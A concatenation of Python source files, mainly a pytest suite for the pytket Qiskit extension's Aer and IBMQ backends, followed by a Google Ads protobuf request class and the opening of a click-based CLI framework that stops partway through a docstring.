c = Circuit(4).CX(0, 1).H(2).CX(2, 1).H(3).CX(0, 3).H(1).X(0).measure_all()
c = back.get_compiled_circuit(c)
assert back.valid_circuit(c)
arch = back.backend_info.architecture
nodes = arch.nodes
assert set(arch.coupling) == set(
[
(nodes[0], nodes[1]),
(nodes[0], nodes[2]),
(nodes[0], nodes[3]),
(nodes[1], nodes[2]),
(nodes[1], nodes[3]),
(nodes[2], nodes[0]),
(nodes[2], nodes[1]),
(nodes[2], nodes[3]),
(nodes[3], nodes[0]),
(nodes[3], nodes[1]),
(nodes[3], nodes[2]),
]
)
def test_circuit_compilation_complete_noise_model() -> None:
my_noise_model = NoiseModel()
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [0, 1])
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [0, 2])
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [0, 3])
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [1, 2])
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [1, 3])
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [2, 3])
my_noise_model.add_quantum_error(depolarizing_error(0.5, 1), ["u3"], [0])
my_noise_model.add_quantum_error(depolarizing_error(0.5, 1), ["u3"], [1])
my_noise_model.add_quantum_error(depolarizing_error(0.5, 1), ["u3"], [2])
my_noise_model.add_quantum_error(depolarizing_error(0.5, 1), ["u3"], [3])
back = AerBackend(my_noise_model)
c = Circuit(4).CX(0, 1).H(2).CX(2, 1).H(3).CX(0, 3).H(1).X(0).measure_all()
c = back.get_compiled_circuit(c)
assert back.valid_circuit(c)
def test_process_characterisation_complete_noise_model() -> None:
my_noise_model = NoiseModel()
readout_error_0 = 0.2
readout_error_1 = 0.3
my_noise_model.add_readout_error(
[
[1 - readout_error_0, readout_error_0],
[readout_error_0, 1 - readout_error_0],
],
[0],
)
my_noise_model.add_readout_error(
[
[1 - readout_error_1, readout_error_1],
[readout_error_1, 1 - readout_error_1],
],
[1],
)
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [0, 1])
my_noise_model.add_quantum_error(depolarizing_error(0.5, 1), ["u3"], [0])
my_noise_model.add_quantum_error(
pauli_error([("X", 0.35), ("Z", 0.65)]), ["u2"], [0]
)
my_noise_model.add_quantum_error(
pauli_error([("X", 0.35), ("Y", 0.65)]), ["u1"], [0]
)
back = AerBackend(my_noise_model)
char = back.backend_info.get_misc("characterisation")
node_errors = cast(Dict, back.backend_info.all_node_gate_errors)
link_errors = cast(Dict, back.backend_info.all_edge_gate_errors)
arch = back.backend_info.architecture
gqe2 = {tuple(qs): errs for qs, errs in char["GenericTwoQubitQErrors"]}
gqe1 = {q: errs for q, errs in char["GenericOneQubitQErrors"]}
assert round(gqe2[(0, 1)][0][1][15], 5) == 0.0375
assert round(gqe2[(0, 1)][0][1][0], 5) == 0.4375
assert gqe1[0][0][1][3] == 0.125
assert gqe1[0][0][1][0] == 0.625
assert gqe1[0][1][1][0] == 0.35
assert gqe1[0][1][1][1] == 0.65
assert gqe1[0][2][1][0] == 0.35
assert gqe1[0][2][1][1] == 0.65
assert node_errors[arch.nodes[0]][OpType.U3] == 0.375
assert round(link_errors[(arch.nodes[0], arch.nodes[1])][OpType.CX], 4) == 0.5625
assert (
round(link_errors[(arch.nodes[1], arch.nodes[0])][OpType.CX], 8) == 0.80859375
)
readout_errors = cast(Dict, back.backend_info.all_readout_errors)
assert readout_errors[arch.nodes[0]] == [
[0.8, 0.2],
[0.2, 0.8],
]
assert readout_errors[arch.nodes[1]] == [
[0.7, 0.3],
[0.3, 0.7],
]
def test_process_model() -> None:
noise_model = NoiseModel()
# add readout error to qubits 0, 1, 2
error_ro = ReadoutError([[0.8, 0.2], [0.2, 0.8]])
for i in range(3):
noise_model.add_readout_error(error_ro, [i])
# add depolarizing error to qubits 3, 4, 5
error_dp_sq = depolarizing_error(0.5, 1)
for i in range(3, 6):
noise_model.add_quantum_error(error_dp_sq, ["u3"], [i])
error_dp_mq = depolarizing_error(0.6, 2)
# add coupling errors
noise_model.add_quantum_error(error_dp_mq, ["cx"], [0, 7])
noise_model.add_quantum_error(error_dp_mq, ["cx"], [1, 2])
noise_model.add_quantum_error(error_dp_mq, ["cx"], [8, 9])
# check basic information has been captured
b = AerBackend(noise_model)
nodes = b.backend_info.architecture.nodes
assert len(nodes) == 9
assert "characterisation" in b.backend_info.misc
assert "GenericOneQubitQErrors" in b.backend_info.misc["characterisation"]
assert "GenericTwoQubitQErrors" in b.backend_info.misc["characterisation"]
node_gate_errors = cast(Dict, b.backend_info.all_node_gate_errors)
assert nodes[3] in node_gate_errors
edge_gate_errors = cast(Dict, b.backend_info.all_edge_gate_errors)
assert (nodes[7], nodes[8]) in edge_gate_errors
def test_cancellation_aer() -> None:
b = AerBackend()
c = circuit_gen(True)
c = b.get_compiled_circuit(c)
h = b.process_circuit(c, 10)
b.cancel(h)
print(b.circuit_status(h))
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_cancellation_ibmq(lima_backend: IBMQBackend) -> None:
b = lima_backend
c = circuit_gen(True)
c = b.get_compiled_circuit(c)
h = b.process_circuit(c, 10)
b.cancel(h)
print(b.circuit_status(h))
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_machine_debug(santiago_backend: IBMQBackend) -> None:
backend = santiago_backend
backend._MACHINE_DEBUG = True
try:
c = Circuit(2, 2).H(0).CX(0, 1).measure_all()
with pytest.raises(CircuitNotValidError) as errorinfo:
handles = backend.process_circuits([c, c.copy()], n_shots=2)
assert "in submitted does not satisfy GateSetPredicate" in str(errorinfo.value)
c = backend.get_compiled_circuit(c)
handles = backend.process_circuits([c, c.copy()], n_shots=4)
from pytket.extensions.qiskit.backends.ibm import _DEBUG_HANDLE_PREFIX
assert all(
cast(str, hand[0]).startswith(_DEBUG_HANDLE_PREFIX) for hand in handles
)
correct_shots = np.zeros((4, 2))
correct_counts = {(0, 0): 4}
res = backend.run_circuit(c, n_shots=4)
assert np.all(res.get_shots() == correct_shots)
assert res.get_counts() == correct_counts
# check that generating new shots still works
res = backend.run_circuit(c, n_shots=4)
assert np.all(res.get_shots() == correct_shots)
assert res.get_counts() == correct_counts
finally:
# ensure shared backend is reset for other tests
backend._MACHINE_DEBUG = False
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_nshots_batching(santiago_backend: IBMQBackend) -> None:
backend = santiago_backend
backend._MACHINE_DEBUG = True
try:
c1 = Circuit(2, 2).H(0).CX(0, 1).measure_all()
c2 = Circuit(2, 2).Rx(0.5, 0).CX(0, 1).measure_all()
c3 = Circuit(2, 2).H(1).CX(0, 1).measure_all()
c4 = Circuit(2, 2).Rx(0.5, 0).CX(0, 1).CX(1, 0).measure_all()
cs = [c1, c2, c3, c4]
n_shots = [10, 12, 10, 13]
cs = backend.get_compiled_circuits(cs)
handles = backend.process_circuits(cs, n_shots=n_shots)
from pytket.extensions.qiskit.backends.ibm import _DEBUG_HANDLE_PREFIX
assert all(
cast(str, hand[0]) == _DEBUG_HANDLE_PREFIX + suffix
for hand, suffix in zip(
handles,
[f"{(2, 10, 0)}", f"{(2, 12, 1)}", f"{(2, 10, 0)}", f"{(2, 13, 2)}"],
)
)
finally:
# ensure shared backend is reset for other tests
backend._MACHINE_DEBUG = False
def test_nshots() -> None:
backends = [AerBackend()]
if not skip_remote_tests:
backends.append(
IBMQEmulatorBackend(
"ibmq_santiago", hub="ibm-q", group="open", project="main"
)
)
for b in backends:
circuit = Circuit(1).X(0)
n_shots = [1, 2, 3]
results = b.get_results(b.process_circuits([circuit] * 3, n_shots=n_shots))
assert [len(r.get_shots()) for r in results] == n_shots
def test_pauli_statevector() -> None:
c = Circuit(2)
c.Rz(0.5, 0)
Transform.OptimisePostRouting().apply(c)
b = AerStateBackend()
zi = QubitPauliString(Qubit(0), Pauli.Z)
assert get_pauli_expectation_value(c, zi, b) == 1
c.X(0)
assert get_pauli_expectation_value(c, zi, b) == -1
def test_pauli_sim() -> None:
c = Circuit(2, 2)
c.Rz(0.5, 0)
Transform.OptimisePostRouting().apply(c)
b = AerBackend()
zi = QubitPauliString(Qubit(0), Pauli.Z)
energy = get_pauli_expectation_value(c, zi, b, 8000)
assert abs(energy - 1) < 0.001
c.X(0)
energy = get_pauli_expectation_value(c, zi, b, 8000)
assert abs(energy + 1) < 0.001
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_default_pass(santiago_backend: IBMQBackend) -> None:
b = santiago_backend
for ol in range(3):
comp_pass = b.default_compilation_pass(ol)
c = Circuit(3, 3)
c.H(0)
c.CX(0, 1)
c.CSWAP(1, 0, 2)
c.ZZPhase(0.84, 2, 0)
c.measure_all()
comp_pass.apply(c)
for pred in b.required_predicates:
assert pred.verify(c)
def test_aer_default_pass() -> None:
with open(os.path.join(sys.path[0], "ibmqx2_properties.pickle"), "rb") as f:
properties = pickle.load(f)
noise_model = NoiseModel.from_backend(properties)
for nm in [None, noise_model]:
b = AerBackend(nm)
for ol in range(3):
comp_pass = b.default_compilation_pass(ol)
c = Circuit(3, 3)
c.H(0)
c.CX(0, 1)
c.CSWAP(1, 0, 2)
c.ZZPhase(0.84, 2, 0)
c.add_gate(OpType.TK1, [0.2, 0.3, 0.4], [0])
comp_pass.apply(c)
c.measure_all()
for pred in b.required_predicates:
assert pred.verify(c)
def test_routing_measurements() -> None:
qc = get_test_circuit(True)
physical_c = qiskit_to_tk(qc)
sim = AerBackend()
original_results = sim.run_circuit(physical_c, n_shots=10, seed=4).get_shots()
coupling = [[1, 0], [2, 0], [2, 1], [3, 2], [3, 4], [4, 2]]
arc = Architecture(coupling)
mm = MappingManager(arc)
mm.route_circuit(physical_c, [LexiLabellingMethod(), LexiRouteRoutingMethod()])
Transform.DecomposeSWAPtoCX().apply(physical_c)
Transform.DecomposeCXDirected(arc).apply(physical_c)
Transform.OptimisePostRouting().apply(physical_c)
assert (
sim.run_circuit(physical_c, n_shots=10).get_shots() == original_results
).all()
def test_routing_no_cx() -> None:
circ = Circuit(2, 2)
circ.H(1)
circ.Rx(0.2, 0)
circ.measure_all()
coupling = [[1, 0], [2, 0], [2, 1], [3, 2], [3, 4], [4, 2]]
arc = Architecture(coupling)
mm = MappingManager(arc)
mm.route_circuit(circ, [LexiRouteRoutingMethod()])
assert len(circ.get_commands()) == 4
def test_counts() -> None:
qc = get_test_circuit(True)
circ = qiskit_to_tk(qc)
sim = AerBackend()
counts = sim.run_circuit(circ, n_shots=10, seed=4).get_counts()
assert counts == {(1, 0, 1, 1, 0): 10}
def test_ilo() -> None:
b = AerBackend()
bs = AerStateBackend()
bu = AerUnitaryBackend()
c = Circuit(2)
c.X(1)
res_s = bs.run_circuit(c)
res_u = bu.run_circuit(c)
assert (res_s.get_state() == np.asarray([0, 1, 0, 0])).all()
assert (res_s.get_state(basis=BasisOrder.dlo) == np.asarray([0, 0, 1, 0])).all()
assert (
res_u.get_unitary()
== np.asarray([[0, 1, 0, 0], [1, 0, 0, 0], [0, 0, 0, 1], [0, 0, 1, 0]])
).all()
assert (
res_u.get_unitary(basis=BasisOrder.dlo)
== np.asarray([[0, 0, 1, 0], [0, 0, 0, 1], [1, 0, 0, 0], [0, 1, 0, 0]])
).all()
c.measure_all()
res = b.run_circuit(c, n_shots=2)
assert (res.get_shots() == np.asarray([[0, 1], [0, 1]])).all()
assert (res.get_shots(basis=BasisOrder.dlo) == np.asarray([[1, 0], [1, 0]])).all()
assert res.get_counts() == {(0, 1): 2}
assert res.get_counts(basis=BasisOrder.dlo) == {(1, 0): 2}
def test_swaps_basisorder() -> None:
# Check that implicit swaps can be corrected irrespective of BasisOrder
b = AerStateBackend()
c = Circuit(4)
c.X(0)
c.CX(0, 1)
c.CX(1, 0)
c.CX(1, 3)
c.CX(3, 1)
c.X(2)
cu = CompilationUnit(c)
CliffordSimp(True).apply(cu)
c1 = cu.circuit
assert c1.n_gates_of_type(OpType.CX) == 2
c, c1 = b.get_compiled_circuits([c, c1])
handles = b.process_circuits([c, c1])
res_c = b.run_circuit(c)
res_c1 = b.run_circuit(c1)
s_ilo = res_c1.get_state(basis=BasisOrder.ilo)
correct_ilo = res_c.get_state(basis=BasisOrder.ilo)
assert np.allclose(s_ilo, correct_ilo)
s_dlo = res_c1.get_state(basis=BasisOrder.dlo)
correct_dlo = res_c.get_state(basis=BasisOrder.dlo)
assert np.allclose(s_dlo, correct_dlo)
qbs = c.qubits
for result in b.get_results(handles):
assert (
result.get_state([qbs[1], qbs[2], qbs[3], qbs[0]]).real.tolist().index(1.0)
== 6
)
assert (
result.get_state([qbs[2], qbs[1], qbs[0], qbs[3]]).real.tolist().index(1.0)
== 9
)
assert (
result.get_state([qbs[2], qbs[3], qbs[0], qbs[1]]).real.tolist().index(1.0)
== 12
)
bu = AerUnitaryBackend()
res_c = bu.run_circuit(c)
res_c1 = bu.run_circuit(c1)
u_ilo = res_c1.get_unitary(basis=BasisOrder.ilo)
correct_ilo = res_c.get_unitary(basis=BasisOrder.ilo)
assert np.allclose(u_ilo, correct_ilo)
u_dlo = res_c1.get_unitary(basis=BasisOrder.dlo)
correct_dlo = res_c.get_unitary(basis=BasisOrder.dlo)
assert np.allclose(u_dlo, correct_dlo)
def test_pauli() -> None:
for b in [AerBackend(), AerStateBackend()]:
c = Circuit(2)
c.Rz(0.5, 0)
c = b.get_compiled_circuit(c)
zi = QubitPauliString(Qubit(0), Pauli.Z)
assert cmath.isclose(get_pauli_expectation_value(c, zi, b), 1)
c.X(0)
assert cmath.isclose(get_pauli_expectation_value(c, zi, b), -1)
def test_operator() -> None:
for b in [AerBackend(), AerStateBackend()]:
c = circuit_gen()
zz = QubitPauliOperator(
{QubitPauliString([Qubit(0), Qubit(1)], [Pauli.Z, Pauli.Z]): 1.0}
)
assert cmath.isclose(get_operator_expectation_value(c, zz, b), 1.0)
c.X(0)
assert cmath.isclose(get_operator_expectation_value(c, zz, b), -1.0)
# TKET-1432 this was either too slow or consumed too much memory when bugged
@pytest.mark.timeout(10)
def test_expectation_bug() -> None:
backend = AerStateBackend()
# backend.compile_circuit(circuit)
circuit = Circuit(16)
with open("big_hamiltonian.json", "r") as f:
hamiltonian = QubitPauliOperator.from_list(json.load(f))
exp = backend.get_operator_expectation_value(circuit, hamiltonian)
assert np.isclose(exp, 1.4325392)
def test_aer_result_handle() -> None:
c = Circuit(2, 2).H(0).CX(0, 1).measure_all()
b = AerBackend()
handles = b.process_circuits([c, c.copy()], n_shots=2)
ids, indices = zip(*(han for han in handles))
assert all(isinstance(idval, str) for idval in ids)
assert indices == (0, 1)
assert len(b.get_result(handles[0]).get_shots()) == 2
with pytest.raises(TypeError) as errorinfo:
_ = b.get_result(ResultHandle("43"))
assert "ResultHandle('43',) does not match expected identifier types" in str(
errorinfo.value
)
wronghandle = ResultHandle("asdf", 3)
with pytest.raises(CircuitNotRunError) as errorinfoCirc:
_ = b.get_result(wronghandle)
assert "Circuit corresponding to {0!r} ".format(
wronghandle
) + "has not been run by this backend instance." in str(errorinfoCirc.value)
def test_aerstate_result_handle() -> None:
c = circuit_gen()
b1 = AerStateBackend()
h1 = b1.process_circuits([c])[0]
state = b1.get_result(h1).get_state()
status = b1.circuit_status(h1)
assert status == CircuitStatus(StatusEnum.COMPLETED, "job has successfully run")
assert np.allclose(state, [np.sqrt(0.5), 0, 0, math.sqrt(0.5)], atol=1e-10)
b2 = AerUnitaryBackend()
unitary = b2.run_circuit(c).get_unitary()
assert np.allclose(
unitary,
np.sqrt(0.5)
* np.array([[1, 0, 1, 0], [0, 1, 0, 1], [0, 1, 0, -1], [1, 0, -1, 0]]),
)
def test_cache() -> None:
b = AerBackend()
c = circuit_gen()
c = b.get_compiled_circuit(c)
h = b.process_circuits([c], 2)[0]
b.get_result(h).get_shots()
assert h in b._cache
b.pop_result(h)
assert h not in b._cache
assert not b._cache
b.run_circuit(c, n_shots=2).get_counts()
b.run_circuit(c.copy(), n_shots=2).get_counts()
b.empty_cache()
assert not b._cache
def test_mixed_circuit() -> None:
c = Circuit()
qr = c.add_q_register("q", 2)
ar = c.add_c_register("a", 1)
br = c.add_c_register("b", 1)
c.H(qr[0])
c.Measure(qr[0], ar[0])
c.X(qr[1], condition=reg_eq(ar, 0))
c.Measure(qr[1], br[0])
backend = AerBackend()
c = backend.get_compiled_circuit(c)
counts = backend.run_circuit(c, n_shots=1024).get_counts()
for key in counts.keys():
assert key in {(0, 1), (1, 0)}
def test_aer_placed_expectation() -> None:
# bug TKET-695
n_qbs = 3
c = Circuit(n_qbs, n_qbs)
c.X(0)
c.CX(0, 2)
c.CX(1, 2)
c.H(1)
# c.measure_all()
b = AerBackend()
operator = QubitPauliOperator(
{
QubitPauliString(Qubit(0), Pauli.Z): 1.0,
QubitPauliString(Qubit(1), Pauli.X): 0.5,
}
)
assert b.get_operator_expectation_value(c, operator) == (-0.5 + 0j)
with open(os.path.join(sys.path[0], "ibmqx2_properties.pickle"), "rb") as f:
properties = pickle.load(f)
noise_model = NoiseModel.from_backend(properties)
noise_b = AerBackend(noise_model)
with pytest.raises(RuntimeError) as errorinfo:
noise_b.get_operator_expectation_value(c, operator)
assert "not supported with noise model" in str(errorinfo.value)
c.rename_units({Qubit(1): Qubit("node", 1)})
with pytest.raises(ValueError) as errorinfoCirc:
b.get_operator_expectation_value(c, operator)
assert "default register Qubits" in str(errorinfoCirc.value)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_ibmq_emulator() -> None:
b_emu = IBMQEmulatorBackend(
"ibmq_santiago", hub="ibm-q", group="open", project="main"
)
assert b_emu._noise_model is not None
b_ibm = b_emu._ibmq
b_aer = AerBackend()
for ol in range(3):
comp_pass = b_emu.default_compilation_pass(ol)
c = Circuit(3, 3)
c.H(0)
c.CX(0, 1)
c.CSWAP(1, 0, 2)
c.ZZPhase(0.84, 2, 0)
c_cop = c.copy()
comp_pass.apply(c_cop)
c.measure_all()
for bac in (b_emu, b_ibm):
assert all(pred.verify(c_cop) for pred in bac.required_predicates)
c_cop_2 = c.copy()
c_cop_2 = b_aer.get_compiled_circuit(c_cop_2, ol)
if ol == 0:
assert not all(pred.verify(c_cop_2) for pred in b_emu.required_predicates)
circ = Circuit(2, 2).H(0).CX(0, 1).measure_all()
copy_circ = circ.copy()
b_emu.rebase_pass().apply(copy_circ)
assert b_emu.required_predicates[1].verify(copy_circ)
circ = b_emu.get_compiled_circuit(circ)
b_noi = AerBackend(noise_model=b_emu._noise_model)
emu_shots = b_emu.run_circuit(circ, n_shots=10, seed=10).get_shots()
aer_shots = b_noi.run_circuit(circ, n_shots=10, seed=10).get_shots()
assert np.array_equal(emu_shots, aer_shots)
@given(
n_shots=strategies.integers(min_value=1, max_value=10),
n_bits=strategies.integers(min_value=0, max_value=10),
)
def test_shots_bits_edgecases(n_shots: int, n_bits: int) -> None:
c = Circuit(n_bits, n_bits)
aer_backend = AerBackend()
# TODO TKET-813 add more shot based backends and move to integration tests
h = aer_backend.process_circuit(c, n_shots)
res = aer_backend.get_result(h)
correct_shots = np.zeros((n_shots, n_bits), dtype=int)
correct_shape = (n_shots, n_bits)
correct_counts = Counter({(0,) * n_bits: n_shots})
# BackendResult
assert np.array_equal(res.get_shots(), correct_shots)
assert res.get_shots().shape == correct_shape
assert res.get_counts() == correct_counts
# Direct
res = aer_backend.run_circuit(c, n_shots=n_shots)
assert np.array_equal(res.get_shots(), correct_shots)
assert res.get_shots().shape == correct_shape
assert res.get_counts() == correct_counts
def test_simulation_method() -> None:
state_backends = [AerBackend(), AerBackend(simulation_method="statevector")]
stabilizer_backend = AerBackend(simulation_method="stabilizer")
clifford_circ = Circuit(2).H(0).CX(0, 1).measure_all()
clifford_T_circ = Circuit(2).H(0).T(1).CX(0, 1).measure_all()
for b in state_backends + [stabilizer_backend]:
counts = b.run_circuit(clifford_circ, n_shots=4).get_counts()
assert sum(val for _, val in counts.items()) == 4
for b in state_backends:
counts = b.run_circuit(clifford_T_circ, n_shots=4).get_counts()
assert sum(val for _, val in counts.items()) == 4
with pytest.raises(AttributeError) as warninfo:
# check for the error thrown when non-clifford circuit used with
# stabilizer backend
stabilizer_backend.run_circuit(clifford_T_circ, n_shots=4).get_counts()
assert "Attribute header is not defined" in str(warninfo.value)
def test_aer_expanded_gates() -> None:
c = Circuit(3).CX(0, 1)
c.add_gate(OpType.ZZPhase, 0.1, [0, 1])
c.add_gate(OpType.CY, [0, 1])
c.add_gate(OpType.CCX, [0, 1, 2])
backend = AerBackend()
assert backend.valid_circuit(c)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_remote_simulator() -> None:
remote_qasm = IBMQBackend(
"ibmq_qasm_simulator", hub="ibm-q", group="open", project="main"
)
c = Circuit(3).CX(0, 1)
c.add_gate(OpType.ZZPhase, 0.1, [0, 1])
c.add_gate(OpType.CY, [0, 1])
c.add_gate(OpType.CCX, [0, 1, 2])
c.measure_all()
assert remote_qasm.valid_circuit(c)
assert sum(remote_qasm.run_circuit(c, n_shots=10).get_counts().values()) == 10
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_ibmq_mid_measure(santiago_backend: IBMQBackend) -> None:
c = Circuit(3, 3).H(1).CX(1, 2).Measure(0, 0).Measure(1, 1)
c.add_barrier([0, 1, 2])
c.CX(1, 0).H(0).Measure(2, 2)
b = santiago_backend
ps = b.default_compilation_pass(0)
ps.apply(c)
# c = b.get_compiled_circuit(c)
assert not NoMidMeasurePredicate().verify(c)
assert b.valid_circuit(c)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_compile_x(santiago_backend: IBMQBackend) -> None:
# TKET-1028
b = santiago_backend
c = Circuit(1).X(0)
for ol in range(3):
c1 = c.copy()
c1 = b.get_compiled_circuit(c1, optimisation_level=ol)
assert c1.n_gates == 1
def lift_perm(p: Dict[int, int]) -> np.ndarray:
"""
Given a permutation of {0,1,...,n-1} return the 2^n by 2^n permuation matrix
representing the permutation of qubits (big-endian convention).
"""
n = len(p)
pm = np.zeros((1 << n, 1 << n), dtype=complex)
for i in range(1 << n):
j = 0
mask = 1 << n
for q in range(n):
mask >>= 1
if (i & mask) != 0:
j |= 1 << (n - 1 - p[q])
pm[j][i] = 1
return pm
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_compilation_correctness(santiago_backend: IBMQBackend) -> None:
c = Circuit(5)
c.H(0).H(1).H(2)
c.CX(0, 1).CX(1, 2)
c.Rx(0.25, 1).Ry(0.75, 1).Rz(0.5, 2)
c.CCX(2, 1, 0)
c.CY(1, 0).CY(2, 1)
c.H(0).H(1).H(2)
c.Rz(0.125, 0)
c.X(1)
c.Rz(0.125, 2).X(2).Rz(0.25, 2)
c.SX(3).Rz(0.125, 3).SX(3)
c.CX(0, 3).CX(0, 4)
u_backend = AerUnitaryBackend()
u = u_backend.run_circuit(c).get_unitary()
ibm_backend = santiago_backend
for ol in range(3):
p = ibm_backend.default_compilation_pass(optimisation_level=ol)
cu = CompilationUnit(c)
p.apply(cu)
c1 = cu.circuit
compiled_u = u_backend.run_circuit(c1).get_unitary()
# Adjust for placement
imap = cu.initial_map
fmap = cu.final_map
c_idx = {c.qubits[i]: i for i in range(5)}
c1_idx = {c1.qubits[i]: i for i in range(5)}
ini = {c_idx[qb]: c1_idx[node] for qb, node in imap.items()}
inv_fin = {c1_idx[node]: c_idx[qb] for qb, node in fmap.items()}
m_ini = lift_perm(ini)
m_inv_fin = lift_perm(inv_fin)
assert compare_unitaries(u, m_inv_fin @ compiled_u @ m_ini)
# pytket-extensions issue #69
def test_symbolic_rebase() -> None:
circ = QuantumCircuit(2)
circ.rx(Parameter("a"), 0)
circ.ry(Parameter("b"), 1)
circ.cx(0, 1)
pytket_circ = qiskit_to_tk(circ)
# rebase pass could not handle symbolic parameters originally and would fail here:
AerBackend().rebase_pass().apply(pytket_circ)
assert len(pytket_circ.free_symbols()) == 2
def _tk1_to_rotations(a: float, b: float, c: float) -> Circuit:
"""Translate tk1 to a RzRxRz so AerUnitaryBackend can simulate"""
circ = Circuit(1)
circ.Rz(c, 0).Rx(b, 0).Rz(a, 0)
return circ
def _verify_single_q_rebase(
backend: AerUnitaryBackend, a: float, b: float, c: float
) -> bool:
"""Compare the unitary of a tk1 gate to the unitary of the translated circuit"""
rotation_circ = _tk1_to_rotations(a, b, c)
u_before = backend.run_circuit(rotation_circ).get_unitary()
circ = Circuit(1)
circ.add_gate(OpType.TK1, [a, b, c], [0])
backend.rebase_pass().apply(circ)
u_after = backend.run_circuit(circ).get_unitary()
return np.allclose(u_before, u_after)
def test_rebase_phase() -> None:
backend = AerUnitaryBackend()
for a in [0.6, 0, 1, 2, 3]:
for b in [0.7, 0, 0.5, 1, 1.5]:
for c in [0.8, 0, 1, 2, 3]:
assert _verify_single_q_rebase(backend, a, b, c)
assert _verify_single_q_rebase(backend, -a, -b, -c)
assert _verify_single_q_rebase(backend, 2 * a, 3 * b, 4 * c)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_postprocess(lima_backend: IBMQBackend) -> None:
b = lima_backend
assert b.supports_contextual_optimisation
c = Circuit(2, 2)
c.SX(0).SX(1).CX(0, 1).measure_all()
c = b.get_compiled_circuit(c)
h = b.process_circuit(c, n_shots=10, postprocess=True)
ppcirc = Circuit.from_dict(json.loads(cast(str, h[2])))
ppcmds = ppcirc.get_commands()
assert len(ppcmds) > 0
assert all(ppcmd.op.type == OpType.ClassicalTransform for ppcmd in ppcmds)
b.cancel(h)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_postprocess_emu() -> None:
b = IBMQEmulatorBackend("ibmq_santiago", hub="ibm-q", group="open", project="main")
assert b.supports_contextual_optimisation
c = Circuit(2, 2)
c.SX(0).SX(1).CX(0, 1).measure_all()
c = b.get_compiled_circuit(c)
h = b.process_circuit(c, n_shots=10, postprocess=True)
ppcirc = Circuit.from_dict(json.loads(cast(str, h[2])))
ppcmds = ppcirc.get_commands()
assert len(ppcmds) > 0
assert all(ppcmd.op.type == OpType.ClassicalTransform for ppcmd in ppcmds)
r = b.get_result(h)
shots = r.get_shots()
assert len(shots) == 10
@pytest.mark.timeout(None)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_cloud_stabiliser() -> None:
b = IBMQBackend("simulator_stabilizer", hub="ibm-q", group="open", project="main")
c = Circuit(2, 2)
c.H(0).SX(1).CX(0, 1).measure_all()
c = b.get_compiled_circuit(c, 0)
h = b.process_circuit(c, n_shots=10)
assert sum(b.get_result(h).get_counts().values()) == 10
c = Circuit(2, 2)
c.H(0).SX(1).Rz(0.1, 0).CX(0, 1).measure_all()
assert not b.valid_circuit(c)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_available_devices() -> None:
backend_info_list = IBMQBackend.available_devices(
hub="ibm-q", group="open", project="main"
)
assert len(backend_info_list) > 0
provider = IBMQ.providers(hub="ibm-q", group="open")[0]
backend_info_list = IBMQBackend.available_devices(account_provider=provider)
assert len(backend_info_list) > 0
backend_info_list = IBMQBackend.available_devices()
assert len(backend_info_list) > 0
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_backendinfo_serialization1() -> None:
# https://github.com/CQCL/tket/issues/192
backend = IBMQEmulatorBackend(
"ibmq_santiago", hub="ibm-q", group="open", project="main"
)
backend_info_json = backend.backend_info.to_dict()
s = json.dumps(backend_info_json)
backend_info_json1 = json.loads(s)
assert backend_info_json == backend_info_json1
def test_backendinfo_serialization2() -> None:
# https://github.com/CQCL/tket/issues/192
my_noise_model = NoiseModel()
my_noise_model.add_readout_error(
[
[0.8, 0.2],
[0.2, 0.8],
],
[0],
)
my_noise_model.add_readout_error(
[
[0.7, 0.3],
[0.3, 0.7],
],
[1],
)
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [0, 1])
my_noise_model.add_quantum_error(depolarizing_error(0.5, 1), ["u3"], [0])
my_noise_model.add_quantum_error(
pauli_error([("X", 0.35), ("Z", 0.65)]), ["u2"], [0]
)
my_noise_model.add_quantum_error(
pauli_error([("X", 0.35), ("Y", 0.65)]), ["u1"], [0]
)
backend = AerBackend(my_noise_model)
backend_info_json = backend.backend_info.to_dict()
s = json.dumps(backend_info_json)
backend_info_json1 = json.loads(s)
assert backend_info_json == backend_info_json1
|
the-stack_0_6514 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v8.services",
marshal="google.ads.googleads.v8",
manifest={"GetDomainCategoryRequest",},
)
class GetDomainCategoryRequest(proto.Message):
r"""Request message for
[DomainCategoryService.GetDomainCategory][google.ads.googleads.v8.services.DomainCategoryService.GetDomainCategory].
Attributes:
resource_name (str):
Required. Resource name of the domain
category to fetch.
"""
resource_name = proto.Field(proto.STRING, number=1,)
__all__ = tuple(sorted(__protobuf__.manifest))
|
the-stack_0_6518 | """
Base classes that implement the CLI framework
"""
import logging
import importlib
from collections import OrderedDict
import click
logger = logging.getLogger(__name__)
_COMMAND_PACKAGE = [
"pcskcli.commands.command1",
"pcskcli.commands.command2",
]
class BaseCommand(click.MultiCommand):
def __init__(self, *args, cmd_packages=None, **kwargs):
"""
Initializes the class, optionally with a list of available commands
:param cmd_packages: List of Python packages names of CLI commands
